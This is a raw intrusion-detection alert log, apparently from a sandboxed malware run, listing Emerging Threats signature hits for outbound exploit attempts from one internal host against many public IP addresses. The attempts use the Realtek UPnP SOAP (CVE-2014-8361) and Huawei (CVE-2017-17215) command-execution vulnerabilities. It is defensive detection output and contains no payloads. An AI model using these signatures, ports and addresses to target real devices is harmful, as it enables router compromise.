                                                07/20/24-23:06:31.663530TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6044852869192.168.2.1418.247.202.59
                                                07/20/24-23:06:02.272029TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5252252869192.168.2.14147.234.87.243
                                                07/20/24-23:05:45.293090TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614820052869192.168.2.14130.125.245.169
                                                07/20/24-23:05:57.198650TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614735452869192.168.2.1438.249.4.4
                                                07/20/24-23:05:40.344189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5843652869192.168.2.1445.124.106.123
                                                07/20/24-23:05:58.094268TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24702252869192.168.2.14101.212.53.40
                                                07/20/24-23:06:03.095402TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614776052869192.168.2.14182.89.241.66
                                                07/20/24-23:05:37.459218TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4780052869192.168.2.1434.247.156.202
                                                07/20/24-23:05:56.086216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497637215192.168.2.1441.245.216.126
                                                07/20/24-23:05:37.475548TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24650852869192.168.2.14131.209.58.23
                                                07/20/24-23:05:38.956391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4184637215192.168.2.1441.123.89.190
                                                07/20/24-23:05:57.224112TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615540852869192.168.2.1420.239.242.93
                                                07/20/24-23:06:13.638173TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5977052869192.168.2.1454.167.61.55
                                                07/20/24-23:06:01.910350TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3829052869192.168.2.1460.51.96.114
                                                07/20/24-23:05:59.471230TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614142652869192.168.2.14184.132.87.238
                                                07/20/24-23:06:53.435475TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4952652869192.168.2.14168.156.209.183
                                                07/20/24-23:06:22.982491TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5220252869192.168.2.1460.46.231.159
                                                07/20/24-23:05:36.327720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4297637215192.168.2.1441.240.81.129
                                                07/20/24-23:05:36.275713TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614106852869192.168.2.1489.77.15.240
                                                07/20/24-23:05:45.392755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4184037215192.168.2.1441.103.13.254
                                                07/20/24-23:05:57.832966TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4432652869192.168.2.1427.77.179.71
                                                07/20/24-23:06:00.067283TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25114452869192.168.2.14161.128.195.195
                                                07/20/24-23:06:08.034671TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615916052869192.168.2.14161.14.214.31
                                                07/20/24-23:06:18.158860TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24895452869192.168.2.1438.39.9.123
                                                07/20/24-23:06:01.556801TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24574252869192.168.2.14166.28.205.27
                                                07/20/24-23:06:38.250934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5079452869192.168.2.1484.65.76.178
                                                07/20/24-23:05:59.930873TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4959652869192.168.2.14125.143.14.140
                                                07/20/24-23:06:02.251198TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23778652869192.168.2.1499.252.205.139
                                                07/20/24-23:06:08.628126TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4051252869192.168.2.1461.85.255.31
                                                07/20/24-23:06:01.285003TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615427852869192.168.2.1485.165.219.183
                                                07/20/24-23:06:16.252147TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3422652869192.168.2.1461.219.255.51
                                                07/20/24-23:05:48.773442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5325837215192.168.2.14166.197.40.110
                                                07/20/24-23:06:11.251823TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5314652869192.168.2.14149.61.158.243
                                                07/20/24-23:07:23.916570TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24643852869192.168.2.14142.60.102.52
                                                07/20/24-23:05:45.187333TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615403652869192.168.2.1473.182.112.4
                                                07/20/24-23:05:37.542289TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25826252869192.168.2.1478.129.211.10
                                                07/20/24-23:06:01.862638TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23818452869192.168.2.1476.195.229.149
                                                07/20/24-23:05:48.821008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5752037215192.168.2.14157.18.156.214
                                                07/20/24-23:06:01.176056TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615015652869192.168.2.1481.98.194.221
                                                07/20/24-23:06:11.425707TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3483652869192.168.2.1435.248.92.7
                                                07/20/24-23:05:37.449942TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26087252869192.168.2.14153.91.158.250
                                                07/20/24-23:05:33.833027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874637215192.168.2.1476.174.76.195
                                                07/20/24-23:05:48.762153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4598837215192.168.2.14157.60.240.103
                                                07/20/24-23:06:14.884095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3993052869192.168.2.1463.202.197.142
                                                07/20/24-23:06:15.408714TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23592252869192.168.2.1412.193.71.48
                                                07/20/24-23:05:58.662427TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25336052869192.168.2.14132.216.98.22
                                                07/20/24-23:05:37.474845TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4269652869192.168.2.14140.198.134.198
                                                07/20/24-23:05:57.198650TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3921052869192.168.2.14159.135.65.187
                                                07/20/24-23:06:24.686159TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615143252869192.168.2.14128.195.98.38
                                                07/20/24-23:06:29.627964TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4543252869192.168.2.1482.89.3.197
                                                07/20/24-23:05:50.571555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5867037215192.168.2.14157.205.246.36
                                                07/20/24-23:06:06.896657TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4640852869192.168.2.1438.8.232.207
                                                07/20/24-23:06:23.571514TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4907852869192.168.2.14178.36.192.91
                                                07/20/24-23:05:35.378993TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614530652869192.168.2.14153.126.184.30
                                                07/20/24-23:06:08.195958TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614992652869192.168.2.1440.174.255.112
                                                07/20/24-23:05:59.972369TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4522652869192.168.2.14107.111.90.22
                                                07/20/24-23:05:35.375806TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615263052869192.168.2.14187.140.68.61
                                                07/20/24-23:05:38.640803TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4976452869192.168.2.14157.171.149.72
                                                07/20/24-23:05:52.557712TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24206852869192.168.2.148.0.192.243
                                                07/20/24-23:06:50.028546TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3302252869192.168.2.14155.136.119.1
                                                07/20/24-23:06:14.162873TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5818852869192.168.2.1464.26.80.76
                                                07/20/24-23:05:37.444466TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24536052869192.168.2.1498.74.12.225
                                                07/20/24-23:06:08.966438TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615484852869192.168.2.14174.211.51.160
                                                07/20/24-23:05:48.230792TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615168452869192.168.2.14154.72.172.164
                                                07/20/24-23:05:58.880153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4634052869192.168.2.14101.212.53.40
                                                07/20/24-23:05:39.680161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793637215192.168.2.14197.219.227.4
                                                07/20/24-23:05:46.273107TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614954852869192.168.2.14189.17.62.143
                                                07/20/24-23:05:57.432998TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3314652869192.168.2.14155.180.189.24
                                                07/20/24-23:06:18.420371TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615570452869192.168.2.1437.12.109.244
                                                07/20/24-23:05:40.339812TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23498052869192.168.2.14206.209.134.255
                                                07/20/24-23:06:22.218849TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25998852869192.168.2.14184.94.246.141
                                                07/20/24-23:06:01.572805TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613355452869192.168.2.14117.112.92.46
                                                07/20/24-23:06:09.741345TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614317052869192.168.2.14179.227.5.10
                                                07/20/24-23:05:39.060021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4430637215192.168.2.1441.220.87.27
                                                07/20/24-23:05:57.592012TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613653252869192.168.2.1468.106.50.107
                                                07/20/24-23:06:00.417227TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615239452869192.168.2.1480.122.195.116
                                                07/20/24-23:05:46.807504TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4203252869192.168.2.148.32.165.235
                                                07/20/24-23:05:57.132087TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614804252869192.168.2.1482.73.119.244
                                                07/20/24-23:05:35.273631TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613359852869192.168.2.14189.230.165.186
                                                07/20/24-23:05:52.632555TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5204052869192.168.2.1446.3.114.133
                                                07/20/24-23:06:06.062295TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5117452869192.168.2.1488.174.31.158
                                                07/20/24-23:05:36.268733TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3365252869192.168.2.1479.15.211.18
                                                07/20/24-23:05:36.580139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219237215192.168.2.14197.207.154.219
                                                07/20/24-23:05:58.174966TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5828852869192.168.2.1453.94.167.97
                                                07/20/24-23:06:09.697115TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616004052869192.168.2.1424.224.126.85
                                                07/20/24-23:06:12.482858TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5652452869192.168.2.1476.6.203.77
                                                07/20/24-23:05:37.468656TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25256652869192.168.2.14149.79.37.237
                                                07/20/24-23:05:56.038244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4902037215192.168.2.14157.140.82.218
                                                07/20/24-23:06:32.467103TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4380052869192.168.2.1449.137.240.216
                                                07/20/24-23:05:47.120793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3282237215192.168.2.1441.134.4.113
                                                07/20/24-23:05:52.589392TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3883652869192.168.2.14207.223.84.204
                                                07/20/24-23:06:05.344940TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616022652869192.168.2.14190.26.67.211
                                                07/20/24-23:05:56.993408TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5968052869192.168.2.14130.169.76.188
                                                07/20/24-23:06:02.598486TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4760052869192.168.2.14212.173.5.107
                                                07/20/24-23:05:50.554912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626037215192.168.2.14222.153.36.208
                                                07/20/24-23:05:57.218020TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4837252869192.168.2.14129.14.146.10
                                                07/20/24-23:05:47.018380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5953837215192.168.2.14197.11.220.240
                                                07/20/24-23:05:50.576749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3456437215192.168.2.14123.4.132.228
                                                07/20/24-23:06:09.698680TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616021252869192.168.2.14180.99.90.112
                                                07/20/24-23:05:36.343227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5518837215192.168.2.1441.55.60.37
                                                07/20/24-23:06:26.022416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5000452869192.168.2.1459.30.21.146
                                                07/20/24-23:05:36.339999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4289037215192.168.2.14157.92.9.122
                                                07/20/24-23:05:36.025383TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4777852869192.168.2.1431.247.190.180
                                                07/20/24-23:05:40.325934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3469452869192.168.2.14126.238.252.160
                                                07/20/24-23:05:46.800280TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614512852869192.168.2.14156.215.77.129
                                                07/20/24-23:06:14.614128TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23420852869192.168.2.1497.55.184.51
                                                07/20/24-23:06:01.851986TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615555052869192.168.2.1462.44.228.192
                                                07/20/24-23:06:11.535629TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5537452869192.168.2.14222.169.26.29
                                                07/20/24-23:06:07.664572TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614558052869192.168.2.14221.53.46.245
                                                07/20/24-23:06:03.476247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3401437215192.168.2.14197.20.11.116
                                                07/20/24-23:05:58.087911TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23736252869192.168.2.14122.131.100.31
                                                07/20/24-23:05:38.933433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851637215192.168.2.14197.178.81.75
                                                07/20/24-23:05:44.686584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4346852869192.168.2.14118.15.81.240
                                                07/20/24-23:05:34.627062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4320637215192.168.2.14133.62.206.236
                                                07/20/24-23:06:01.263525TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615258452869192.168.2.1493.108.39.188
                                                07/20/24-23:05:36.013470TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5800652869192.168.2.1459.165.217.161
                                                07/20/24-23:05:57.906796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4822052869192.168.2.1478.254.150.241
                                                07/20/24-23:06:01.876678TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613620452869192.168.2.1483.37.163.73
                                                07/20/24-23:05:58.954404TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25908652869192.168.2.1453.94.167.97
                                                07/20/24-23:05:37.449068TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24622452869192.168.2.1464.104.54.14
                                                07/20/24-23:05:37.468386TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4838052869192.168.2.14216.17.47.144
                                                07/20/24-23:05:58.893722TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4304452869192.168.2.1467.24.164.252
                                                07/20/24-23:05:58.706531TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615942052869192.168.2.1418.247.202.59
                                                07/20/24-23:06:00.927462TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613382052869192.168.2.1437.48.45.30
                                                07/20/24-23:05:46.755424TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615566652869192.168.2.14184.34.105.168
                                                07/20/24-23:06:01.813206TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615192652869192.168.2.14165.79.131.219
                                                07/20/24-23:06:19.828184TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25965852869192.168.2.1469.227.93.244
                                                07/20/24-23:05:50.498027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4091237215192.168.2.14211.249.150.64
                                                07/20/24-23:05:56.316062TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613468252869192.168.2.14150.121.194.2
                                                07/20/24-23:05:52.502843TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5191052869192.168.2.14197.133.121.224
                                                07/20/24-23:06:02.512491TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5294052869192.168.2.1420.92.79.193
                                                07/20/24-23:05:33.853184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5524237215192.168.2.1441.189.66.95
                                                07/20/24-23:05:38.399887TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614930252869192.168.2.1491.121.169.191
                                                07/20/24-23:06:23.120505TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613736252869192.168.2.14175.208.49.127
                                                07/20/24-23:06:01.961036TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26043052869192.168.2.1482.59.244.30
                                                07/20/24-23:05:39.050437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3667637215192.168.2.14116.205.214.70
                                                07/20/24-23:05:35.879451TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613487052869192.168.2.14114.179.104.124
                                                07/20/24-23:05:56.069521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5381037215192.168.2.1495.29.118.162
                                                07/20/24-23:05:33.861759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699037215192.168.2.14197.153.130.241
                                                07/20/24-23:06:01.467143TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5100452869192.168.2.14146.113.147.42
                                                07/20/24-23:06:09.698680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3796652869192.168.2.14196.147.50.36
                                                07/20/24-23:05:48.775023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4360237215192.168.2.1441.140.47.212
                                                07/20/24-23:05:56.928848TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615940652869192.168.2.14199.41.219.25
                                                07/20/24-23:05:45.258139TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5068452869192.168.2.14183.224.136.118
                                                07/20/24-23:06:13.391443TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615480852869192.168.2.14129.99.98.243
                                                07/20/24-23:05:56.997034TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613921252869192.168.2.14143.90.94.100
                                                07/20/24-23:06:10.116912TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25117652869192.168.2.1491.181.24.50
                                                07/20/24-23:05:40.365973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4938852869192.168.2.1474.88.51.163
                                                07/20/24-23:05:57.631218TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4187852869192.168.2.14212.79.198.77
                                                07/20/24-23:05:52.502632TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25749052869192.168.2.14159.81.180.197
                                                07/20/24-23:07:07.975226TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613487452869192.168.2.14159.222.72.181
                                                07/20/24-23:05:47.359487TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615249052869192.168.2.14147.243.70.201
                                                07/20/24-23:05:50.528919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6082637215192.168.2.14157.27.96.13
                                                07/20/24-23:05:57.417957TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24938452869192.168.2.1482.73.119.244
                                                07/20/24-23:06:01.909656TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4389852869192.168.2.1439.96.83.57
                                                07/20/24-23:05:56.066947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5742437215192.168.2.1466.202.79.145
                                                07/20/24-23:05:45.468009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5811837215192.168.2.14157.114.227.107
                                                07/20/24-23:05:45.117900TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614820452869192.168.2.14183.184.211.239
                                                07/20/24-23:06:14.641445TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24521852869192.168.2.14137.55.138.211
                                                07/20/24-23:07:03.123324TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3696052869192.168.2.14132.191.29.38
                                                07/20/24-23:06:10.376182TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3506252869192.168.2.14194.77.230.54
                                                07/20/24-23:05:59.197388TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5030652869192.168.2.1494.49.228.97
                                                07/20/24-23:06:07.499893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491237215192.168.2.14189.101.108.144
                                                07/20/24-23:05:37.517011TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3765452869192.168.2.1443.124.228.32
                                                07/20/24-23:05:39.216845TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614834652869192.168.2.1468.41.73.225
                                                07/20/24-23:05:34.657123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5848437215192.168.2.14151.249.104.249
                                                07/20/24-23:05:47.103906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734637215192.168.2.14197.49.72.236
                                                07/20/24-23:05:45.988990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4966837215192.168.2.14197.60.59.152
                                                07/20/24-23:05:50.528919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037837215192.168.2.1420.37.51.202
                                                07/20/24-23:06:00.153687TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614454852869192.168.2.1467.170.114.216
                                                07/20/24-23:05:45.403074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5697237215192.168.2.14157.125.35.160
                                                07/20/24-23:05:34.657123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952837215192.168.2.14193.24.185.130
                                                07/20/24-23:06:06.027833TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615271452869192.168.2.1483.207.51.198
                                                07/20/24-23:05:35.325929TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614236252869192.168.2.1452.248.88.164
                                                07/20/24-23:06:07.419849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5354437215192.168.2.1467.68.67.36
                                                07/20/24-23:05:39.924564TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4466452869192.168.2.1427.37.230.189
                                                07/20/24-23:05:56.056582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5187437215192.168.2.14157.197.82.28
